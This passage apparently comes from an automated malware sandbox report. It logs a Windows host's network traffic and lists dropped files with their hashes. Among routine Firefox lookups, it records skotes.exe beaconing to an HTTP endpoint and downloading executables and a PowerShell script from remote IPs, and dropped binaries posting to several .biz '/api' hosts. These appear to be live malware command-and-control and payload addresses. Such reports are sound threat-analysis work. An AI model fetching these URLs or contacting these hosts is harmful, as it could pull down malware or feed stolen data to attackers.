                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    a19.dscg10.akamai.net
                    IN AAAA
                    Response
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:869b
                    a19.dscg10.akamai.net
                    IN AAAA
                    2a02:26f0:a1::58dd:86d1
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.180.14
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN A
                    Response
                    redirector.gvt1.com
                    IN A
                    142.250.180.14
                  • flag-us
                    DNS
                    redirector.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    redirector.gvt1.com
                    IN AAAA
                    Response
                    redirector.gvt1.com
                    IN AAAA
                    2a00:1450:4009:81e::200e
                  • flag-us
                    DNS
                    r3---sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3---sn-4g5edn6k.gvt1.com
                    IN A
                    Response
                    r3---sn-4g5edn6k.gvt1.com
                    IN CNAME
                    r3.sn-4g5edn6k.gvt1.com
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    74.125.111.136
                  • flag-us
                    DNS
                    r3.sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    Response
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    74.125.111.136
                  • flag-us
                    DNS
                    r3.sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3.sn-4g5edn6k.gvt1.com
                    IN AAAA
                    Response
                    r3.sn-4g5edn6k.gvt1.com
                    IN AAAA
                    2a00:1450:4001:d::8
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    142.250.179.238
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    142.250.179.238
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN AAAA
                    Response
                    play.google.com
                    IN AAAA
                    2a00:1450:4009:81d::200e
                  • 185.215.113.43:80
                    http://185.215.113.43/Zu7JuNko/index.php
                    http
                    skotes.exe
                    3.2kB
                    3.7kB
                    24
                    16

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.43/Zu7JuNko/index.php

                    HTTP Response

                    200
                  • 31.41.244.11:80
                    http://31.41.244.11/files/5131681669/KeaEfrP.ps1
                    http
                    skotes.exe
                    206.4kB
                    11.2MB
                    4366
                    11532

                    HTTP Request

                    GET http://31.41.244.11/files/6554834407/B3vKvPi.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/806475321/0tClIDb.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/7658082748/wTMEVe8.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/6554834407/ntRoEwh.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://31.41.244.11/files/5131681669/KeaEfrP.ps1

                    HTTP Response

                    200
                  • 104.21.16.9:443
                    https://atten-supporse.biz/api
                    tls, http
                    0tClIDb.exe
                    982 B
                    4.3kB
                    9
                    9

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.162.65:443
                    https://se-blurry.biz/api
                    tls, http
                    0tClIDb.exe
                    977 B
                    4.3kB
                    9
                    9

                    HTTP Request

                    POST https://se-blurry.biz/api

                    HTTP Response

                    200
                  • 104.21.62.142:443
                    https://zinc-sneark.biz/api
                    tls, http
                    0tClIDb.exe
                    1.7kB
                    9.9kB
                    14
                    17

                    HTTP Request

                    POST https://zinc-sneark.biz/api

                    HTTP Response

                    403

                    HTTP Request

                    POST https://zinc-sneark.biz/api

                    HTTP Response

                    200
                  • 185.215.113.16:80
                    http://185.215.113.16/off/random.exe
                    http
                    skotes.exe
                    221.7kB
                    7.7MB
                    3827
                    5515

                    HTTP Request

                    GET http://185.215.113.16/luma/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/steam/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/well/random.exe

                    HTTP Response

                    200

                    HTTP Request

                    GET http://185.215.113.16/off/random.exe

                    HTTP Response

                    200
                  • 104.21.16.9:443
                    https://atten-supporse.biz/api
                    tls, http
                    78c83a40ec.exe
                    982 B
                    4.3kB
                    9
                    9

                    HTTP Request

                    POST https://atten-supporse.biz/api

                    HTTP Response

                    200
                  • 172.67.162.65:443
                    https://se-blurry.biz/api
                    tls, http
                    78c83a40ec.exe
                    977 B
                    4.3kB
                    9
                    9

                    HTTP Request

                    POST https://se-blurry.biz/api

                    HTTP Response

                    200
                  • 104.21.62.142:443
                    https://zinc-sneark.biz/api
                    tls, http
                    78c83a40ec.exe
                    1.7kB
                    9.9kB
                    14
                    16

                    HTTP Request

                    POST https://zinc-sneark.biz/api

                    HTTP Response

                    403

                    HTTP Request

                    POST https://zinc-sneark.biz/api

                    HTTP Response

                    200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    2427caf3c8.exe
                    727 B
                    625 B
                    5
                    5

                    HTTP Request

                    GET http://185.215.113.206/

                    HTTP Response

                    200

                    HTTP Request

                    POST http://185.215.113.206/c4becf79229cb002.php

                    HTTP Response

                    200
                  • 127.0.0.1:50992
                    firefox.exe
                  • 216.58.213.14:443
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    tls, http2
                    firefox.exe
                    1.9kB
                    9.0kB
                    15
                    20

                    HTTP Request

                    GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  • 34.120.5.221:443
                    https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    tls, http2
                    firefox.exe
                    1.7kB
                    12.3kB
                    13
                    18

                    HTTP Request

                    GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  • 142.250.180.14:443
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    tls, http2
                    firefox.exe
                    3.0kB
                    66.7kB
                    32
                    63

                    HTTP Request

                    GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

                    HTTP Request

                    GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  • 34.117.121.53:443
                    firefox-settings-attachments.cdn.mozilla.net
                    tls
                    firefox.exe
                    1.5kB
                    21.1kB
                    15
                    23
                  • 142.250.200.46:443
                    consent.youtube.com
                    tls, http2
                    firefox.exe
                    1.2kB
                    7.6kB
                    10
                    10
                  • 127.0.0.1:51001
                    firefox.exe
                  • 142.250.187.196:443
                    https://www.google.com/favicon.ico
                    tls, http2
                    firefox.exe
                    1.8kB
                    7.5kB
                    14
                    16

                    HTTP Request

                    GET https://www.google.com/favicon.ico
                  • 88.221.134.155:80
                    http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                    http
                    firefox.exe
                    7.3kB
                    467.0kB
                    152
                    339

                    HTTP Request

                    GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                    HTTP Response

                    200
                  • 142.250.180.14:443
                    redirector.gvt1.com
                    tls
                    firefox.exe
                    1.7kB
                    8.9kB
                    18
                    21
                  • 74.125.111.136:443
                    r3---sn-4g5edn6k.gvt1.com
                    tls
                    firefox.exe
                    321.9kB
                    8.7MB
                    5047
                    6248
                  • 142.250.179.238:443
                    play.google.com
                    tls, http2
                    firefox.exe
                    1.3kB
                    7.6kB
                    11
                    10
                  • 8.8.8.8:53
                    atten-supporse.biz
                    dns
                    78c83a40ec.exe
                    64 B
                    96 B
                    1
                    1

                    DNS Request

                    atten-supporse.biz

                    DNS Response

                    104.21.16.9
                    172.67.165.166

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    78c83a40ec.exe
                    59 B
                    91 B
                    1
                    1

                    DNS Request

                    se-blurry.biz

                    DNS Response

                    172.67.162.65
                    104.21.81.153

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    78c83a40ec.exe
                    61 B
                    93 B
                    1
                    1

                    DNS Request

                    zinc-sneark.biz

                    DNS Response

                    104.21.62.142
                    172.67.136.167

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    216.58.213.14

                  • 8.8.8.8:53
                    spocs.getpocket.com
                    dns
                    firefox.exe
                    65 B
                    131 B
                    1
                    1

                    DNS Request

                    spocs.getpocket.com

                    DNS Response

                    34.117.188.166

                  • 8.8.8.8:53
                    getpocket.cdn.mozilla.net
                    dns
                    firefox.exe
                    71 B
                    174 B
                    1
                    1

                    DNS Request

                    getpocket.cdn.mozilla.net

                    DNS Response

                    34.120.5.221

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    216.58.213.14

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.188.166

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request

                    prod.ads.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    85 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    2a00:1450:4009:816::200e

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    34.120.5.221

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    119 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    34.160.144.191

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    116 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                    DNS Response

                    35.85.93.176
                    52.33.231.145
                    44.228.225.150

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    2600:1901:0:524c::

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    131 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    2600:1901:0:92a9::

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    153 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.149.100.209

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    187 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                  • 216.58.213.14:443
                    youtube.com
                    https
                    firefox.exe
                    3.2kB
                    9.3kB
                    7
                    10
                  • 8.8.8.8:53
                    www.youtube.com
                    dns
                    firefox.exe
                    61 B
                    319 B
                    1
                    1

                    DNS Request

                    www.youtube.com

                    DNS Response

                    142.250.180.14
                    216.58.201.110
                    172.217.169.78
                    216.58.212.206
                    142.250.187.206
                    172.217.169.46
                    142.250.187.238
                    142.250.200.14
                    216.58.204.78
                    142.250.178.14
                    172.217.16.238
                    142.250.200.46
                    142.250.179.238
                    172.217.169.14

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    293 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    172.217.16.238
                    216.58.204.78
                    216.58.212.206
                    172.217.169.14
                    142.250.179.238
                    142.250.200.46
                    172.217.169.78
                    142.250.180.14
                    172.217.169.46
                    216.58.201.110
                    142.250.178.14
                    142.250.187.238
                    142.250.187.206
                    142.250.200.14

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    181 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    2a00:1450:4009:815::200e
                    2a00:1450:4009:821::200e
                    2a00:1450:4009:823::200e
                    2a00:1450:4009:820::200e

                  • 8.8.8.8:53
                    firefox-settings-attachments.cdn.mozilla.net
                    dns
                    firefox.exe
                    90 B
                    177 B
                    1
                    1

                    DNS Request

                    firefox-settings-attachments.cdn.mozilla.net

                    DNS Response

                    34.117.121.53

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    106 B
                    122 B
                    1
                    1

                    DNS Request

                    attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.121.53

                  • 142.250.180.14:443
                    youtube-ui.l.google.com
                    https
                    firefox.exe
                    5.1kB
                    11.1kB
                    11
                    16
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    106 B
                    199 B
                    1
                    1

                    DNS Request

                    attachments.prod.remote-settings.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    2a00:1450:4009:823::200e

                  • 142.250.200.46:443
                    consent.youtube.com
                    https
                    firefox.exe
                    2.2kB
                    9.3kB
                    9
                    11
                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.187.196

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.187.196

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    88 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    2a00:1450:4009:81f::2004

                  • 142.250.187.196:443
                    www.google.com
                    https
                    firefox.exe
                    3.2kB
                    9.3kB
                    7
                    10
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    prod.balrog.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.balrog.prod.cloudops.mozgcp.net

                    DNS Response

                    35.244.181.201

                  • 8.8.8.8:53
                    prod.balrog.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request

                    prod.balrog.prod.cloudops.mozgcp.net

                  • 8.8.8.8:53
                    ciscobinary.openh264.org
                    dns
                    firefox.exe
                    70 B
                    286 B
                    1
                    1

                    DNS Request

                    ciscobinary.openh264.org

                    DNS Response

                    88.221.134.155
                    88.221.134.209

                  • 8.8.8.8:53
                    a19.dscg10.akamai.net
                    dns
                    firefox.exe
                    67 B
                    99 B
                    1
                    1

                    DNS Request

                    a19.dscg10.akamai.net

                    DNS Response

                    88.221.134.209
                    88.221.134.155

                  • 8.8.8.8:53
                    a19.dscg10.akamai.net
                    dns
                    firefox.exe
                    67 B
                    123 B
                    1
                    1

                    DNS Request

                    a19.dscg10.akamai.net

                    DNS Response

                    2a02:26f0:a1::58dd:869b
                    2a02:26f0:a1::58dd:86d1

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    142.250.180.14

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    142.250.180.14

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    2a00:1450:4009:81e::200e

                  • 142.250.180.14:443
                    redirector.gvt1.com
                    https
                    firefox.exe
                    3.3kB
                    9.3kB
                    8
                    10
                  • 8.8.8.8:53
                    r3---sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    71 B
                    116 B
                    1
                    1

                    DNS Request

                    r3---sn-4g5edn6k.gvt1.com

                    DNS Response

                    74.125.111.136

                  • 8.8.8.8:53
                    r3.sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    69 B
                    85 B
                    1
                    1

                    DNS Request

                    r3.sn-4g5edn6k.gvt1.com

                    DNS Response

                    74.125.111.136

                  • 8.8.8.8:53
                    r3.sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    69 B
                    97 B
                    1
                    1

                    DNS Request

                    r3.sn-4g5edn6k.gvt1.com

                    DNS Response

                    2a00:1450:4001:d::8

                  • 74.125.111.136:443
                    r3.sn-4g5edn6k.gvt1.com
                    https
                    firefox.exe
                    1.9kB
                    5.9kB
                    6
                    7
                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    142.250.179.238

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    142.250.179.238

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    89 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    2a00:1450:4009:81d::200e

                  • 142.250.179.238:443
                    play.google.com
                    https
                    firefox.exe
                    3.3kB
                    8.5kB
                    8
                    7

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                    Filesize

                    23KB

                    MD5

                    75f6e8b4105fa9fede84f65f6800f093

                    SHA1

                    09a71ef491c7440f2eb836cf6d7169f6e40ba064

                    SHA256

                    59e2066df7f8d5151618f0f6f1efb59df9ca4f5f2a5e8c1cf0d0768061ce7fb4

                    SHA512

                    3b88d43a17fd008553e9784d7843b15655bf1e239b91cd8046237bd4452acd3fcd24d493b4e799d83380f7295aed4f5f389d423075b74673f5e8b5125826469f

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                    Filesize

                    15KB

                    MD5

                    96c542dec016d9ec1ecc4dddfcbaac66

                    SHA1

                    6199f7648bb744efa58acf7b96fee85d938389e4

                    SHA256

                    7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                    SHA512

                    cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                  • C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe

                    Filesize

                    2.2MB

                    MD5

                    3541c1ac26eb5bbb87f01c20fd9f8824

                    SHA1

                    bf5d136c911491f59bdeb3bf37b8f1a155fd3a97

                    SHA256

                    b7cd929ce4d0fa849eeab8a216e1333f63c7d3530da674f163efab4dae3439d1

                    SHA512

                    babc17723d2389919acd96f977821d57bdd737f01a9598209efafa72ae0418e914a5d229f196d80cb5ba70ce82b0f340b18aa255bbe4ed77d821a432d5794a93

                  • C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe

                    Filesize

                    1.8MB

                    MD5

                    6367fb8a64f997be8d65536534bdd057

                    SHA1

                    3ee062142dde2330881566a63a92957037a0e6b3

                    SHA256

                    bdae46a5cb1f1b6b9864b5e944ed5b2e24622d7385a196e0293f7b9da59bda5e

                    SHA512

                    ace2dbba313180a64f70f49c7763fb9da23ef76b82548c8fa54a7d1e8d4810cad83726fe532459660e12e4f6a9210df09dd836ea28f1cc5a791a4873b95a274c

                  • C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe

                    Filesize

                    3.9MB

                    MD5

                    5db95c4de9b6e98c653ac3dec5dce83d

                    SHA1

                    c3e1cb98b5450d21c8e9e975148c282afcf4ccae

                    SHA256

                    8ac4f1dcdf7ce5276d4ee9dbdaeaa4232aa8ad0c383bf804472f156ae2a879c7

                    SHA512

                    42e5504904f0db4e62d56c03c8e7e302df0eba488a966259aa686e7d952db8a25eb56b5ac72731400cfd2541b6429d82e95e3bb8e87565bdf0cbe2b488c47368

                  • C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe

                    Filesize

                    1.8MB

                    MD5

                    c42fbc53b1b42194728f4f5904cc925a

                    SHA1

                    e62e1d938f9a9be31f3ccb82ece3997354df132b

                    SHA256

                    46253c842675dfbc5fc9c852bcf64e6d6175b6efe9d81774b6d84e42a3be9cb9

                    SHA512

                    e833b0fa711fd4bfaf3f00c1d816b4f7988959f445509089f4795f4d6a419aed154b2d33cb71ea49e918c82ba0545d70a36eed8687597378b0065817f8bb5f95

                  • C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe

                    Filesize

                    1.7MB

                    MD5

                    7dcf4c4df2997ccd8c4a0fd2398b784a

                    SHA1

                    7f623f31d30a0d45058eeaa38f12ecf43f54fd33

                    SHA256

                    4c2d2f9f76daff7560ac8bf55c348f7051216db171fba2a25f7ac939410b7cff

                    SHA512

                    697dbc4f0cda3affdfcf0639b53de8a67273cd4ff3e356236277cb2851c6c24be67c4b6ed51bc1229a842ddbd53231b07d2b9dba2d484447240066ad32845d1b

                  • C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe

                    Filesize

                    948KB

                    MD5

                    ea332702c8adf6f8be3dd834363924bd

                    SHA1

                    eaf972aeb4a0eebeede9b2a53c48670965af4d17

                    SHA256

                    3b609f119a3ac3d881d7e2e7bf637618500e6d5afe0b65f9087b6653cbbc42eb

                    SHA512

                    02662320d09805f2a09fd7431576a7b70c83fdc2ea6a139e53c23509705659b4a9034f135383166b0c0d0f3777f0220a53d2e7a02a2a1642af96eb0030cb44fc

                  • C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe

                    Filesize

                    2.7MB

                    MD5

                    ed56e3fd052ff78dc552adc8c68c1ae1

                    SHA1

                    a3ec743c5faf04b546213f35d186599704da24c3

                    SHA256

                    d4a86adb78b87482ffaf354bdddfd4b0db486b10de088f923851c23e25f7813b

                    SHA512

                    975391c94d487377d5c3c240a9f83b8edaad51f9cab4bfb6f7705a23ab8a0435961bde4f3469f30b3c1c351586f4d664a091eb3584bd21c33524735fbc3e7556

                  • C:\Users\Admin\AppData\Local\Temp\1013248041\KeaEfrP.ps1

                    Filesize

                    2KB

                    MD5

                    62e668d5993865a150073479bdc42ec5

                    SHA1

                    b2b4e7767c5b0c9218127401c8d8b8723148ffc7

                    SHA256

                    ea4b7480d291e1e3ec6029bc92c3c732d005ad215518e8c483388b8227f4dd52

                    SHA512

                    6ba4fe44398b89a82804013151a73f4aa00be9468d76cf2b40fe7a410c4d646c84ab10f2561fed694ee0b3a24bd50f46a75427097996be171a83f671196b0cbc

                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\callmobile.exe

                    Filesize

                    2.3MB

                    MD5

                    ffabcc262fb699998b6191d7656c8805

                    SHA1

                    fd3ea79a8550b14e9cc75fb831fd7a141964a714

                    SHA256

                    f46e4a7de978baceec5f64cbc9fa1f1e772e864fa3310045cd19d77264698cde

                    SHA512

                    79b2e21a9111b16b0f67ae5d1cc40a25773b847d3f4cf78711a8dfd8b67c30beec332ed65ac008c9dca62c84de891eff20d7c6050bc868bce77a17fe56da61ba

                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                    Filesize

                    3.1MB

                    MD5

                    2b3dca9f3f8f7b379021a041b731aed3

                    SHA1

                    e8fc7d977c0a76e25b1e69f4398a10fef83918d0

                    SHA256

                    ec798a7883c65756c2d8c19fdd14a24353ab0584e2d7cf4920a798938272cc24

                    SHA512

                    ce65473353253347788ed1d0641a6c6a3be815c50bd1046c1aa8bf827f48c0f09b61560f3aa3eeb8f641afa6d7a870dd68834615b3fe81b6f62a9ffee946f98a

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                    Filesize

                    442KB

                    MD5

                    85430baed3398695717b0263807cf97c

                    SHA1

                    fffbee923cea216f50fce5d54219a188a5100f41

                    SHA256

                    a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                    SHA512

                    06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                  • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                    Filesize

                    8.0MB

                    MD5

                    a01c5ecd6108350ae23d2cddf0e77c17

                    SHA1

                    c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                    SHA256

                    345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                    SHA512

                    b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                    Filesize

                    2KB

                    MD5

                    ba0763d4f96d8dab974f8ae6f1e937b2

                    SHA1

                    5cfc302c4f569507beae68775d6c6bd25e4999cf

                    SHA256

                    a32ddd799482a64ec2c05fe9536a980890d3a7144b5acc64fa512551d16f700b

                    SHA512

                    daa4e149e691372c5990579d4911547035f368205ea735eb51a98748d4bd57b774ac689cddc7ff1526aeae6fdf4f5958ba99d8de5bd5a910064a611229d6919f

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\80e7919d-90e5-47ca-8444-778326d8aa30

                    Filesize

                    745B

                    MD5

                    97df97229d034ec347463058d48aea7d

                    SHA1

                    6e1490a40efb7baa1932ebe64e3cd5dc45250403

                    SHA256

